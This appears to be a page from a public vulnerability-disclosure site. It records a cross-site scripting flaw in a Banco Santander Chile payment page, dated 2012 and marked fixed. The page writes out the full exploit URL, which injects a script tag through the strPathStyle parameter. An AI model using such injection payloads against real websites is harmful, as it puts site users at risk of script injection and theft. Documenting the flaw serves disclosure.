Common Vulnerabilities

Cross Site Scripting
33%
SQL Injection
30%
Full Path Disclosure
23%
Data Leak
3%
Directory Traversal
2%

Search


...[<Vulnerability: 2203>]

Affected Entity: Banco Santander Chile

Actions: Tweet

Main URI: https://www.santander.cl/
Type: Cross Site Scripting
Exploitable URI: https://www.santander.cl/transa/WebPayGarantizado/plant_defecto_WP.asp?strPageCode=WPI&strUrl=&strPathStyle=estilo_defectorrrr.css%22%3Eaaa%3Cscript%3Ealert%28/XSS%20Santander/%29%3C/script%3E&strOriginCode=ASP&strAgentCode=NEG&strDscAgent=&strErrorCode=-5&strSubErrorCode=0&strDscError=Error:%20Conexi%F3n%20inv%E1lida,%20entraron%20directamente%20a%20la%20p%E1gina%20sin%20token%20Transbank
Status: Fixed
Date: Jan. 25, 2012, 10:17 p.m.
Comments:
La vulnerabilidad fue reportada hace 8 dias y no han dado solucion. Es posible inyectar codigo html/javascript (xss) mediante la variable PathStyle





Disclaimer | PublicKey | Report | Contact
Secureless.org - Copyleft 2011. Powered by django.